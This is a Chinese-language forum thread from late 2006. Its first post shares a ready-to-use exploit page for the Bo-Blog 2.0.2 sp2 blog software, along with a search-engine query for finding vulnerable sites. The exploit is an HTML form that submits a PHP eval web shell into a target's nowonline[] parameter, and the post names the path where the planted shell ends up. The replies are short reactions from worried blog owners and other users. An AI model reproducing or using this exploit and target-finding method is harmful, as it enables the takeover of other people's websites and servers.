huniao 发表于 2006 年 12 月 31 日 19:45:00

预祝元旦快乐!Bo-BlogV2.0.2sp2的利用程序

Bo-BlogV2.0.2sp2的利用程序吧!自己保存为htm文件,百度搜索:powered by bo-blog 2.0.2 sp2

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>The Csript For The "<?php eval($_POST)?>" </TITLE>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content="MSHTML 6.00.2800.1479" name=GENERATOR></HEAD>
<BODY style="FONT-SIZE: 9pt">
--------------------------------- Exp of Bo-BlogV2.0.2sp2--------------------------------- <br>
<FORM name=frm method=post target=_blank>Url: <INPUT
style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"
size=34 value=http://www.bo-blog.com/ name=act> shell: <INPUT
style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"
size=30 value="&lt;?php eval($_POST);?&gt;" name=nowonline[]> <INPUT onclick="Javascipt:action=document.all.act.value;frm.submit();" type=button value="提 交" name=Send></FORM>
<br>
----------------------- 提交后,一句话马地址是 /data/online.php ----------------------------
</BODY></HTML>

254432 发表于 2006 年 12 月 31 日 19:47:08

草了,刚安装了BO-BLOG,地址在签名里,大家测试测试

vbvs 发表于 2006 年 12 月 31 日 19:50:53

彻底对这个程序失去信心

风之翼灵 发表于 2006 年 12 月 31 日 19:59:57

那我BLOG不是死定了?

幽鬼狼魂 发表于 2006 年 12 月 31 日 21:39:15

我先 吐这个0day作者一身先。。。

伤心♂oO○ 发表于 2006 年 12 月 31 日 21:44:27

不知道怎么利用呀

77 发表于 2006 年 12 月 31 日 21:46:24

记得V猪的是BO的
....

monkey5882 发表于 2006 年 12 月 31 日 21:47:39

一直都用F2和TT。。

iyaner 发表于 2006 年 12 月 31 日 21:48:54

回复 #7 yoko 的帖子

对了,已经补X X了

monkey5882 发表于 2006 年 12 月 31 日 21:49:59

回复 #9 yaner 的帖子

不良倾向你怎么可以打出来???
页: [1] 2
查看完整版本: 预祝元旦快乐!Bo-BlogV2.0.2sp2的利用程序